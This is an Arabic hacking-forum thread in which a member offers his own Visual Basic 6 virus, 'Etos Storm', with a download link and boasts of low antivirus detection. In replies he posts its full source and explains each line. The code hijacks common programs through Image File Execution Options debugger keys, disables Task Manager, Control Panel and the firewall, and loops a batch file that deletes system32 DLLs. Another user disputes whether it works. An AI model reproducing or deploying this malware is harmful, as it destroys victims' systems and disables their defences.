اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر

فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 16

الموضوع: فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر

  1. #1
    هكر مبتديء Array الصورة الرمزية etos
    تاريخ التسجيل
    Jul 2010
    الدولة
    مـصـر
    المشاركات
    60

    new فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر



    بسم الله الرحمن الرحيم

    هذا ثانى موضوع لى فى المنتدى, بالرغم انى من متابعيه من سنوات
    احب ان اقدم لكم احدى فيروساتى التى قمت بتصميمها بنفسى منذ سنه تقريبا ولكنى لم اعلن بذلك على اى موقع, فموقعكم الاولى
    هذا الفيروس تعبت جدا فى برمجته, فقد استلزم منى الجهد والبحث الكثير , والحمد لله نتج هذا الفيروس, وانا صممت فيروسين اخرين ولكن سوف اعلن عنهم فى موضوع مستقل

    معلومات عن الفيروس:

    اسم الفيروس: Etos Storm
    حجم الفيروس: KB32
    المبرمج: Etos
    لغه البرمجه: vb6
    مستواه: خطير

    اضراره:
    تكون اضرار الفيروس كالتالى:
    1- ازاله ملفات dll من System 32 مما يؤدى الى اصابه الويندوز بالشلل (تعطيل البرامج والالعاب والكثير من الاخطاء)
    2- قتل متصفح الويندوز (حتى وان قامت الضحيه باعاده تشغيل الجهاز فسيكون معطل)
    3- تعطيل الدوس Cmd
    4- تعطيل Task Manager
    5- الغاء الزر الايمن للماوس
    6- تبطئ الماوس بنسبه تقريبيه 60% من الوضع الطبيعى ( القيمه الافتراضيه من 16:10 , الفيروس يقوم بجعلها 3 )
    7- تعطيل Control Panel وعدم امكانيه التحكم بكافه الخيارات
    8- تعطيل كل خدمات الانترنت المرتبطه بالبرامج
    9- محو ملفات Drivers فى بارتشن النظام
    10- تعطيل System Propreties
    11- تعطيل firewall ( الخاص بالويندوز)
    12- العبث بدقه الالوان ( القيمه الافتراضيه 16 , الفيروس يجعلها 3 )
    13- اما بالنسبه لـ Cd-Rom فقط عطلت فيها حاجتين :
    1- خاصيه Autorun
    2- خاصيه Disable Start

    -14 تعطيل برامج الشات والمحادثات:
    1- تعطيل Yahoo
    2- تعطيل MSN
    3- تعطيل Skype

    15- تعطيل المتصفحات الاتيه:
    1- تعطيل متصفح Internet explorer
    2- تعطيل متصفح Firefox
    3- تعطيل متصفح Opera
    4- تعطيل متصفح Avant
    5- تعطيل متصفح Chrome

    16- تعطيل بعض البرامج العامه:
    1- تعطيل برنامج Winrar
    2- تعطيل برنامج Adobe Reader
    3- تعطيل برنامج Winamp
    4- تعطيل برنامج Windows Media Player
    5- تعطيل برنامج Movie Maker

    فحص الفيروس على مواقع الحمايه:
    فحصه على موقع www.metascan-online.com/
    (40 حمايه)


    ونرى ان 6 حمايات من 40 حمايه هى التى تكشفه....وهم:

    BitDefender
    Generic.Malware.Tk.DD598D74

    Commtouch
    W32/VBTrojan.Downloader.1D!Maximus

    F-prot
    W32/VBTrojan.Downloader.1D!Maximus

    F-secure
    Generic.Malware.Tk.DD598D74

    Ikarus
    Trojan.Crypt


    وان شاء الله سوف اقوم بتشفيره

    التحميل:
    http://www.gulfup.com/?eTyaaY

    اخوكم ايــتــوس



  2. #2
    هكر متميز Array الصورة الرمزية موآدع
    تاريخ التسجيل
    Jul 2012
    الدولة
    السعودية | جـــدة
    المشاركات
    720

    افتراضي رد: فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر

    جاري تجربه الفيروس ولي رجعه


  3. #3
    هكر متميز Array الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,793

    افتراضي رد: فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر

    جاري التجربه

    - - - تم التحديث - - -

    حبي الفايوس 100 100 ابشرك لابتوبي انمسح وصارت بيه الاعيب انا كنت حاب افرمت هههههههه بفرمت وجيكم

    - - - تم التحديث - - -

    حاب اكلك عشت يا بطل تدمر الابتوب راحوا الضحايا ههههه

    - - - تم التحديث - - -

    صراحتا يبني اشو كلو اختفا ب بقا كوكل كروم

    - - - تم التحديث - - -

    احس طاير في الهوى

    - - - تم التحديث - - -

    بس في شي غريب بالفايروس اشتغلن cmd 7 بس اشتغل سيرفر ايضا معاهم

    - - - تم التحديث - - -

    فسر العباره سيرفر مع الفيجول ومسحت بالاداة بعد ممسح الوندوز

    - - - تم التحديث - - -

    سلااااااااااااااااااااااا م شباب حبكي فايروساتكم خطيره

    - - - تم التحديث - - -

    طبعا زهكت ومحغلق الجهاز ولا حفرمت حختبر كل الفيروسات واتاكد انها حتحرق ما تبقى من الجهاز

    - - - تم التحديث - - -

    طيب كيف حكافح المرض

    - - - تم التحديث - - -

    الفايروس كذب والدليل بتصفح بكوكل وفاتح سكايب بس اختفت الشاشه وشتغل سيرفر والسيستم سليم والحمدلله ويمكن اذا اعدت التشغيل يعود

    - - - تم التحديث - - -

    اعدت التشغيل ورجع كل شي
    وذا سيرفر وبعض الاوامر الي تخفي الشاشه لوقت معين يرجى من الاداره حذف الموضوع واذا حابين تتاكداو اسوي فديو والله اراويكم يالملغمين

    - - - تم التحديث - - -

    اعدت التشغيل ورجع كل شي
    وذا سيرفر وبعض الاوامر الي تخفي الشاشه لوقت معين يرجى من الاداره حذف الموضوع واذا حابين تتاكداو اسوي فديو والله اراويكم يالملغمين


    - - - تم التحديث - - -

    [SIZE=6]الفديو الي صورته من غرب مؤقتا بينزل على الرابط [/SIZ=6
    وشوفوا الفديو واتمنى من الاداره تشوف الفديو وتغلق الموضوع ملغوم



  4. #4
    هكر مبتديء Array الصورة الرمزية etos
    تاريخ التسجيل
    Jul 2010
    الدولة
    مـصـر
    المشاركات
    60

    افتراضي رد: فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر

    لا حول ولا قوه الا بالله
    يا اخى هل تلقى التهم جزافا سامحك الله
    لا مشكله من وجود مشاكل فى الفيروس فنحن كلنا مبتدأون...
    اما انك تقول ان دا سيرفر وتطلب غلق الموضوع بحجه انه ملغوم... فمع احترامى هذا كلام لا يقوم على دليل
    وحضرتك تابع نفسك وشارح فى فيديو

    انت تقول انه بيفتح دوس... اقولك فعلا
    هذا هو الكود بالفيجوال بيسك:

    Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
    (ByVal hWnd1 As Long, ByVal hWnd2 As Long, _
    ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
    Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, _
    ByVal nCmdShow As Long) As Long
    Option Explicit
    Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

    Private Sub Form_Load()
    On Error Resume Next
    Dim W
    Dim WindowsD As String
    WindowsD = Space(144)
    W = GetWindowsDirectory(WindowsD, 144)
    Text1.Text = WindowsD
    App.TaskVisible = False
    Dim hwnd As Long
    hwnd = FindWindowEx(0&, 0&, "Progman", vbNullString)
    ShowWindow hwnd, 0
    Shell "taskkill /f /im explorer.exe"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Skype.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moviemk.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winamp.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmplayer.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinRAR.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmsgs.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\YahooMessenger.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\system\DisableTaskMgr", "00000001", "REG_DWORD"
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoControlPanel", "00000001", "REG_DWORD"
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoViewContextMenu", "00000001", "REG_DWORD"
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoWebServies", "00000001", "REG_DWORD"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoPropertiesMyCompute r", "00000001", "REG_DWORD"
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\MouseSensitivity", "00000999", "REG_DWORD"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ SharedAccess\Parameters\FirewallPolicy\StandardPro file\EnableFirewall", "0", "REG_DWORD"
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickSpeed", "1", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics\Shell Icon BPP", "3", "REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\Cdrom\AutoRun", 0, "REG_DWORD"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\Cdrom\Start", 0, "REG_DWORD"
    Shell "taskkill /f /im WinRAR.exe"
    Shell "taskkill /f /im firefox.exe"
    Shell "taskkill /f /im IEXPLORE.exe"
    Shell "taskkill /f /im YahooMessenger.exe"
    Shell "taskkill /f /im msmsgs.exe"
    Shell "taskkill /f /im opera.exe"
    Shell "taskkill /f /im avant.exe"
    Shell "taskkill /f /im mpc-hc.exe"
    Shell "taskkill /f /im wmplayer.exe"
    Open Text1.Text & "\Etos Storm.bat" For Output As #1
    Print #1, "@echo off"
    Print #1, "break off"
    Print #1, ":V"
    Print #1, "del " & Text1.Text & "\system32\*.dll"
    Print #1, "goto V"
    Close #1
    Shell Text1.Text & "Etos Storm.bat", vbHide
    End Sub




    هل علمت يا اخى لماذا فتح الدوس.... ستجد فى الكود السابق الاجابه
    واعذرنى انا لم افهم ما كتبته فى البوست السابق... لا اهفهم لهجتك العاميه

    - - - تم التحديث - - -

    وانت يا اخى هل تستهزأ بى فى هذا الفيديو... فى الصوره التى وضعتها فى البدايه
    اخى احب ان اذكرك انك مهما كنت قد وصلت فى قمه العلم فستجد نفسك فى النهايه لا تعلم
    والجاهل هو من ادعى تمام العلم
    وانت تستهزأ بى وعلى قله معلوماتى......فلن اجيب وارد عليك يا اخى... بل سأقول لك يكفينى هذا العلم الضئيل,على ان اكون محترف واستهزأ بالاخرين الاقل منى خبره


    - - - تم التحديث - - -

    وانت يا اخى هل تستهزأ بى فى هذا الفيديو... فى الصوره التى وضعتها فى البدايه
    اخى احب ان اذكرك انك مهما كنت قد وصلت فى قمه العلم فستجد نفسك فى النهايه لا تعلم
    والجاهل هو من ادعى تمام العلم
    وانت تستهزأ بى وعلى قله معلوماتى......فلن اجيب وارد عليك يا اخى... بل سأقول لك يكفينى هذا العلم الضئيل,على ان اكون محترف واستهزأ بالاخرين الاقل منى خبره


  5. #5
    هكر متميز Array الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,793

    افتراضي رد: فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر

    هههههههههههههه اخي العزيز
    انت اولا مصانع فايروس صصانع اكاذيب اولا
    - ازاله ملفات dll من System 32 مما يؤدى الى اصابه الويندوز بالشلل (تعطيل البرامج والالعاب والكثير من الاخطاء)
    2- قتل متصفح الويندوز (حتى وان قامت الضحيه باعاده تشغيل الجهاز فسيكون معطل)
    3- تعطيل الدوس Cmd
    4- تعطيل Task Manager
    5- الغاء الزر الايمن للماوس
    6- تبطئ الماوس بنسبه تقريبيه 60% من الوضع الطبيعى ( القيمه الافتراضيه من 16:10 , الفيروس يقوم بجعلها 3 )
    7- تعطيل Control Panel وعدم امكانيه التحكم بكافه الخيارات
    8- تعطيل كل خدمات الانترنت المرتبطه بالبرامج
    9- محو ملفات Drivers فى بارتشن النظام
    10- تعطيل System Propreties
    11- تعطيل firewall ( الخاص بالويندوز)
    12- العبث بدقه الالوان ( القيمه الافتراضيه 16 , الفيروس يجعلها 3 )
    13- اما بالنسبه لـ Cd-Rom فقط عطلت فيها حاجتين :
    1- خاصيه Autorun
    2- خاصيه Disable Start

    -14 تعطيل برامج الشات والمحادثات:
    1- تعطيل Yahoo
    2- تعطيل MSN
    3- تعطيل Skype

    15- تعطيل المتصفحات الاتيه:
    1- تعطيل متصفح Internet explorer
    2- تعطيل متصفح Firefox
    3- تعطيل متصفح Opera
    4- تعطيل متصفح Avant
    5- تعطيل متصفح Chrome

    16- تعطيل بعض البرامج العامه:
    1- تعطيل برنامج Winrar
    2- تعطيل برنامج Adobe Reader
    3- تعطيل برنامج Winamp
    4- تعطيل برنامج Windows Media Player
    5- تعطيل برنامج Movie Maker
    اشو مصار شي من الي قلته وقلت حتلو بعد اعاة التشغيل
    وك ثم اذاه كشف الهوست هي راوتني بعيني سيرفر يشتغل مدموج مع البيانات يعني اجذب عيوني
    طيب جذبت عيوني وين عمل الفايروس كلامك خرط كله

    - - - تم التحديث - - -

    اريد جواب او الفايروس ذا ما اله عمل اساسا

    - - - تم التحديث - - -

    ثم اخي من العيب استهزا بيك وانما انبهك على ان اخطائك تصححها في المستقبل ولكن انا لا سوى كلمة صحيحه مثل مقلت كلمة يمسح فلان لازم تطبق كلامك


  6. #6
    هكر مبتديء Array الصورة الرمزية etos
    تاريخ التسجيل
    Jul 2010
    الدولة
    مـصـر
    المشاركات
    60

    افتراضي رد: فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر

    اخى العزيز
    الكود عندك بالفيجوال بيسك... لا مشكله انه يوجد بعض الاخطاء
    انت تقول سيرفر........اقول لك لا
    والفيصل بينى وبينك يا اخى هو من خبير يحلل كود الفيروس
    ولو وجد عكس الكود الذى وضعته فلتفعله ما تشائون..... واتحدى

    انت تقول ان كلامى غلط وان هذا الفيروس لا عمل له
    راجع الكود جيدا يا اخى وحلله, لا اعلم هل تفهم فى الفيجوال بيسك ام لا
    فلو كنت تعلم لن تقول ذلك
    وكما قولت الفيصل بينى وبينك تحليل الفيروس



  7. #7
    هكر متميز Array الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,793

    افتراضي رد: فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر

    طيب حبي امري لله بس مقلتلك هو كله سيرفر لك من يشتغل باداةprocexp رح تشتغل كلفة اوارمرك لكن سوف يعمل سيرفر اخي ومن يعمل يسحب نت يعني شيسمونه هذا طيب ثم لا فرق بين عربين واعجمي .......الا بالتقوى

    - - - تم التحديث - - -

    رح اصير عركه من وره فايروس هههههههههههههههههههههههه


  8. #8
    هكر مبتديء Array الصورة الرمزية etos
    تاريخ التسجيل
    Jul 2010
    الدولة
    مـصـر
    المشاركات
    60

    افتراضي رد: فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر

    كود PHP:
    Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
    (ByVal hWnd1 As LongByVal hWnd2 As Long_
    ByVal lpsz1 
    As StringByVal lpsz2 As String) As Long
    Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long_
    ByVal nCmdShow 
    As Long) As Long
    Option Explicit
    Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As StringByVal nSize As Long) As Long 
    تعريفات للعمليات الجاريه

    كود PHP:
    Private Sub Form_Load() 
    بدايه الحدث
    كود PHP:
    On Error Resume Next 
    تجاوز الاخطاء او سموها كما ترييدون

    كود PHP:
    Dim W
    Dim WindowsD 
    As String
    WindowsD 
    Space(144)
    GetWindowsDirectory(WindowsD144
    داله تحدد الويندوز

    كود PHP:
    App.TaskVisible False 
    اخفاء البرنامج من التاسك مانيجر
    كود PHP:
    Dim hwnd As Long
    hwnd 
    FindWindowEx(0&, 0&, "Progman"vbNullString)
    ShowWindow hwnd
    الغاء start

    كود PHP:
    Shell "taskkill /f /im explorer.exe" 
    قتل الويندوز اكسبلورر
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ" 
    كود ريجسترى لعمل debugger لملف chrome الى مسار اخر, مما يعنى لو اى حد جيه يشغله لن يفتح فى هذا المسار وستأتى له رساله خطأ

    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Skype.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ" 
    عمل debugger للاسكاى بى
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ" 
    عمل debugger لمتصفح الويندوز
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moviemk.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ" 
    عمل debugger للموفى ميكر
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winamp.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ" 
    عمل debugger للوينامب
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmplayer.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinRAR.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmsgs.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\YahooMessenger.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ 
    "
    وكل هذااااااااااااااا عمل debugger للملفات الى موجوده فى كود الريجسرترى ويجعلها تعمل فى مسار مما يعنى تعطيل البرنامج
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\system\DisableTaskMgr""00000001""REG_DWORD" 
    تعطيل التاسك مانجر من الريجسترى

    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoControlPanel""00000001""REG_DWORD" 
    تعطيل الكنترول بانل من الريجسترى
    كود PHP:

    CreateObject
    ("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoViewContextMenu""00000001""REG_DWORD" 
    تعطيل بعض الاعدادات من الريجسترى
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoWebServies""00000001""REG_DWORD" 
    تعطيل خدمات الويب من الريجسترى
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ"
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger""C:\WINDOWS\security\Fatel Error.exe""REG_SZ" 
    عمل debugger للانترنت اكسبلورر والفاير فوكس الى مسار اخر
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoPropertiesMyCompute r""00000001""REG_DWORD"
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\MouseSensitivity""00000999""REG_DWORD 
    "
    الاول تعطيل الاعدادات
    الاخير مسئول عن الماوس
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ SharedAccess\Parameters\FirewallPolicy\StandardPro file\EnableFirewall""0""REG_DWORD" 
    تعطيل حائط النار
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickSpeed""1""REG_SZ 
    "
    مسئوله عن سرعه الماوس
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\Cdrom\AutoRun"0"REG_DWORD 
    "
    تعطيل الاوتو رن للسى دى او اليو اس بى
    كود PHP:
    CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\Cdrom\Start"0"REG_DWORD 
    "
    شبيه بالكود السابق
    كود PHP:
    Shell "taskkill /f /im WinRAR.exe"
    Shell "taskkill /f /im firefox.exe"
    Shell "taskkill /f /im IEXPLORE.exe"
    Shell "taskkill /f /im YahooMessenger.exe"
    Shell "taskkill /f /im msmsgs.exe"
    Shell "taskkill /f /im opera.exe"
    Shell "taskkill /f /im avant.exe"
    Shell "taskkill /f /im mpc-hc.exe"
    Shell "taskkill /f /im wmplayer.exe 
    "
    كل هذا يقتل هذه الملفات من التاسك مانجر
    وهى المسئول عن ظهور صفحات الدوس التى تظهر ثم تختفى
    كود PHP:
    Open Text1.Text "\Etos Storm.bat" For Output As #1
    Print #1, "@echo off"
    Print #1, "break off"
    Print #1, ":V"
    Print #1, "del " & Text1.Text & "\system32\*.dll"
    Print #1, "goto V"
    Close #1
    Shell Text1.Text "Etos Storm.bat"vbHide 
    عمل ملف bat لمسح ملفاتdll التى ليست قيد العمل
    كود PHP:
    End Sub 
    نهايه الداله


    - - - تم التحديث - - -

    يا اخى تكلم بالعربيه الفصحه لا افهم لهجتك


  9. #9
    هكر متميز Array الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,793

    افتراضي رد: فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر

    يا روحي يا روحي سجلت فديو من فتح الفايروس للنهايه
    ما اله عمل والله ما سوى اي شي بالجهاز والله اتنازل عن كلامي فايروس ولكن ما ادى الفايروس عمله الفايروس ذا ما ادى عمله اذا الموضوع ما يفيد لان الاساس فيه هو عمل الفايروس

    - - - تم التحديث - - -

    طبعا اعتذر عن كلمة سيرفر بس اشتغل بصيغة .exe
    ولكن ما ادى عمله يا روحي

    - - - تم التحديث - - -

    \ليل ما ادى عمله
    طيب اه انا عملت ريستارت ورجع



  10. #10
    هكر مبتديء Array الصورة الرمزية etos
    تاريخ التسجيل
    Jul 2010
    الدولة
    مـصـر
    المشاركات
    60

    افتراضي رد: فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر

    اقتباس المشاركة الأصلية كتبت بواسطة ahmedfreed مشاهدة المشاركة
    يا روحي يا روحي سجلت فديو من فتح الفايروس للنهايه
    ما اله عمل والله ما سوى اي شي بالجهاز والله اتنازل عن كلامي فايروس ولكن ما ادى الفايروس عمله الفايروس ذا ما ادى عمله اذا الموضوع ما يفيد لان الاساس فيه هو عمل الفايروس

    - - - تم التحديث - - -

    طبعا اعتذر عن كلمة سيرفر بس اشتغل بصيغة .exe
    ولكن ما ادى عمله يا روحي

    هذا اكثر ما يحيرنى !!!!!

    ما هى المشكله فى هذا الكود. انا ارى انه سليم والدوال سليمه
    فكيف لا يفعل اى شيئ
    !!!!!!!!!!!!!!!!!!

    لعل وعسى احد من خبراء الفيجوال بيسك يخبرونى بالسبب او بالخطأ الموجود


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. مجموعة إيميلات مميزة متاحه Hotmail.it اهداء لاعضاء جيوش الهكر
    بواسطة Mr.JnOoN في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 32
    آخر مشاركة: 02-01-2013, 12:03 PM
  2. برنامج لتسريع الانترنت اهداء لاعضاء جيوش الهكر ادخل وحمل
    بواسطة مهكر القلوب في المنتدى منتدى البرامج - تحميل برامج
    مشاركات: 0
    آخر مشاركة: 04-04-2011, 10:58 PM
  3. برنامج تجميد اميل الياهو من برمجتى بحقوق جيوش الهكر مع الشرح بالفيديو مش متفيرس
    بواسطة hesham في المنتدى قسم المواضيع المخالفة والمكررة
    مشاركات: 19
    آخر مشاركة: 03-28-2011, 07:46 PM
  4. هااااااام جدا لاعضاء جيوش الهكر ادخل
    بواسطة فيصل ال حسين في المنتدى منتدى الإختراق العام
    مشاركات: 0
    آخر مشاركة: 10-06-2010, 05:33 PM

وجد الزوار هذه الصفحة بالبحث عن:

http:www.aljyyosh.comvbshowthread.phpt=44431

اوامر بوت ميلودياختراق بوت طريقة لتزحيط البوت مولدياوامر بوت اسيداأقوى هكر تزحيط بوتات ‏هكرالفايروس سيريا تالكاهم اوامر بوت اسيداجيوش الهكرز تزحيط بوت اسيدااختراق بوت اسيداموقع الفايروس لبرامج الهكر سيرياتالكجميع اوامر بوت اسيداهكرالفايروس سيرياتالكهكر الفايروس سيرياطريقة تزحيط بوت اسيداتزحيط اسيدااختراق بوت اسیدافايروس سيرياتالكاقوى الاوامر لبوتات اسيداسرقة رومات وتزحيط البوتاتاسيدا هكرتحميل برنامج هكر سيرياتالكاقوى هكر فايروس البوتاتموقع الفايروس هكر سيرياتالكجيوش الهكر سيريا تالك

المفضلات

